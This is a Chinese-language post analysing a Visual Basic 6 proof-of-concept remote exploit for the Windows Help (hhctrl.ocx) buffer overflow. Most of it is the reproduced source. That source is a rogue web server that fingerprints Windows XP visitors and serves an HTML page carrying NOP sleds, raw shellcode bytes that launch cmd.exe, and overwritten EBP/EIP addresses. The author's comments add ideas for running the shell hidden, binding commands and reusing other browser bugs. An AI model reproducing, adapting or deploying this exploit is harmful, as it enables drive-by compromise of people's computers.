windows help buffer overflow代码.txt

可以对黑客编程有一定的了解

今天在wawa的站点上看到这个东西
Windows Help Buffer Overflow proof of concept remote exploit in Visual Basic 
6. Starts a cmd.exe shell on Microsoft Windows XP Kernel Version 5.1.2600.0. 
Includes source. By Sylvain Descoteaux download program
windows help buffer的exp，是用vb6编写的。我当然很感兴趣，就简单的分析了一下：
首先这个就叫vbexp把，他用了2个text/一个button/一个标签和一个Winsock控件。
然后利用动态的增加Winsock控件，因此Winsock控件的index属性为0
在Form_load里面的代码是
NbSck = 0 ’是默认Winsock的index的数值
然后下面分析
Private Sub tcp_ConnectionRequest(Index As Integer, ByVal requestID As Long)
On Error Resume Next
NbSck = NbSck + 1
Load tcp(NbSck)
tcp(NbSck).Accept requested
End Sub
‘增加了错误陷阱，然后每次接受到连接请求的时候Nbsck的值加1，实现动态的增加Winsock控件，
然后使这个新增加的控件接受合法请求连接。
Private Sub tcp_DataArrival(Index As Integer, ByVal bytesTotal As Long)
Dim Data As String
Dim Send_It As Boolean 
tcp(Index).GetData Data ‘接受数据
Text1 = Text1 + Data ‘更新接受数据
If InStr(Text1, "indows NT 5.1") Then ‘如果在Text接受到的数据中搜索到’indows NT 5.1’ 则
Text1 = "Client: " + tcp(Index).RemoteHostIP + vbCrLf + "Windows Version: NT 5.1" + vbCrLf + "-----------------------------" ‘显示远程连接的服务器ip，然后显示Windows Version NT 5.1….当远方用户用ie连接这个模拟的服务器的时候会自动发送系统版本号码，然后判断是不是xp是的话就进行ovel :),我错怪了作者
    EBP = Chr(19) + Chr(216) + Chr(36) + Chr(17) ‘
    EIP = Chr(84) + Chr(200) + Chr(19) + Chr(0) ‘
    ‘0x0013c854
    Buildin_The_BuFFer 
    Send_It = True ‘如果在Text中搜索到indows NT 5.1，给下面的Send_It创造运行条件。
End If 

If Send_It Then ‘判断Send_It的值为真的话，继续下面
    If tcp(Index).State = 7 Then ‘如果和远程主机连接的话则
        tcp(Index).SendData vbCrLf + "HTTP/1.1 200 OK" + vbCrLf ‘构造标记头
        tcp(Index).SendData "Content-Length: " + Str(Len(Buffer) + 10000) & vbCrLf 
        tcp(Index).SendData "Server: Evil." & vbCrLf
        tcp(Index).SendData "Date: Thu, 03 Oct 2002 17:57:10 GMT" & vbCrLf
        tcp(Index).SendData "Content-Type: text/html" & vbCrLf
        tcp(Index).SendData "Connection: Keep-Alive" + vbCrLf
        tcp(Index).SendData vbCrLf
        tcp(Index).SendData Html_Page ‘将构造server的伪装包头发到客户端
        Text1 = Text1 + vbCrLf + "buffer has been sent to " + tcp(Index).RemoteHostIP + vbCrLf
        Text1 = Text1 + "Buffer Size Was: " + Str(Len(Buffer)) + " bytes." + vbCrLf
        Text1 = Text1 + "First ShellCode size was: " + Str(Len(ShellCodeFrst)) + " bytes." + vbCrLf
        Text1 = Text1 + "Shellcode Size was: " + Str(Len(ShellCode)) + " bytes." + vbCrLf ‘发送到本地Text1
    End If
End If
End Sub
------------------ Module1.bas模块的代码分析：
Global NbSck As Integer
Global EIP As Variant
Global EBP As Variant
Global Buffer As Variant
Global ShellCodeFrst As Variant
Global ShellCode As Variant
Global Html_Page As Variant ‘定义Bbsck=〉winsock为数值变量，定义EIP,EBP地址变量 ,Buffer…..
Public Sub Buildin_The_BuFFer()
‘‘‘‘‘ buffer looks like that
‘whatver.chm-Nop-ShellcodeFrst-Nop-ShellCode-Nop-Ebp-Eip
‘nop are unimportant
‘ShellcodeFrst does : add edi,46
‘                   : jmp edi
‘(Shellcode is at EDI)
‘ShellCode does : Start up a cmd.exe (not remote) and crash IE
‘               : taken in a paper from David Litchfield
‘‘This proof of concept works with
‘Microsoft Windows XP Kernel Version 5.1.2600.0
‘Affected software:
‘ Microsoft Windows 98
‘ Microsoft Windows 98 Second Edition
‘ Microsoft Windows Millennium Edition
‘ Microsoft Windows NT 4.0
‘ Microsoft Windows NT 4.0, Terminal Server Edition
‘ Microsoft Windows 2000
‘ Microsoft Windows XP
‘Size of the Buffer depends on the Windows Version
‘Based on the Unchecked Buffer in Windows Help
‘Other cool modif of this "proof of concept" would be nice to see ;)
‘sylvain.descoteaux@sympatico.ca
‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘ FIRST SHELLCODE THAT POINT TO THE BIG SHELLCODE ‘‘‘‘‘‘‘‘‘‘
ShellCodeFrst = Chr(131) + Chr(199) + Chr(46) + Chr(255) + Chr(231)
For i = 1 To 14
nop = nop + Chr(144)
Next i
ShellCodeFrst = "x.chm" + nop + ShellCodeFrst + nop + Chr(144)
‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘ THE BIG SHELLCODE ‘‘‘‘‘‘‘‘‘‘‘‘‘‘
nop = ""
ShellCode = ""
ShellCode = Chr(139) + Chr(236) + Chr(51) + Chr(255) + Chr(87) + Chr(131) + Chr(236) + Chr(4) + Chr(198) + Chr(69) + Chr(248) + Chr(99) + Chr(198) + Chr(69) + Chr(249) + Chr(109) + Chr(198) + Chr(69) + Chr(250) + Chr(100) + Chr(198) + Chr(69) + Chr(251) + Chr(46) + Chr(198) + Chr(69) + Chr(252) + Chr(101) + Chr(198) + Chr(69) + Chr(253) + Chr(120) + Chr(198) + Chr(69) + Chr(254) + Chr(101) + Chr(184) + Chr(68) + Chr(128) + Chr(194) + Chr(119) + Chr(80) + Chr(141) + Chr(69) + Chr(248) + Chr(80) + Chr(255) + Chr(85) + Chr(244)
For i = 1 To 349
nop = nop + Chr(144)
Next i
ShellCode = nop + ShellCode + nop + Chr(144)’定义了shellcode部分，本代码的精华所在，因为我接触的shellcode都是x86 for linux/没有在vb下用chr(*)调用过
‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘ THE BUFFER ‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘
Buffer = ShellCodeFrst + ShellCode + EBP + EIP + """>" ‘Buffer…….:)shellcode
‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘‘ THE HTML PAGE WITH THE BUFFER ‘‘‘‘‘‘‘‘
Html_Page = "<OBJECT id=weurg type=""application/x-oleobject""" + vbCrLf
Html_Page = Html_Page + "classid=""clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11""" + vbCrLf
Html_Page = Html_Page + "codebase=""file:hhctrl.ocx#Version=4,0,0,24""" + vbCrLf
Html_Page = Html_Page + "width=80" + vbCrLf
Html_Page = Html_Page + "height=20>" + vbCrLf
Html_Page = Html_Page + "<PARAM name=""Command"" value=""Related Topics, MENU"">" + vbCrLf
Html_Page = Html_Page + "<PARAM name=""Item1""" + vbCrLf
Html_Page = Html_Page + "value=""EN_CHANGE;c:\" + Buffer + vbCrLf
Html_Page = Html_Page + "</OBJECT>" + vbCrLf
Html_Page = Html_Page + "<s cript>weurg.HHclick()</s cript>" + vbCrLf
End Sub
‘利用的IE的漏洞，如果我用其他的Command 来替换PARAM中的nmae=””结果会怎么样? ?

这个时候cmd是自动弹出个窗口，如果给cmd加上一个参数就可以在后台运行，不会被发现。当然还可以生成脚本文件，或来bind command等等
从这里，说说被动式攻击，运行这个visual server at http port上，比如是80,当一个系统版本是NT 5.1就是xp访问的时候，就触发了
tcp(Index).GetData Data 
Text1 = Text1 + Data 
If InStr(Text1, "indows NT 5.1") Then
…...部分
然后进行下一步的*作运行.
Html_Page = Html_Page + "classid=""clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11""" + vbCrLf
Html_Page = Html_Page + "codebase=""file:hhctrl.ocx#Version=4,0,0,24""" + vbCrLf
在这个模块中，这些可以替换的，但又利用ie其他的bug，来运行指定的脚本或按你的想法来做.
从这个代码中，可以看到，用vb可以作到Exp的构架，然后只要能在shellcode加工，因该不难写出Exploit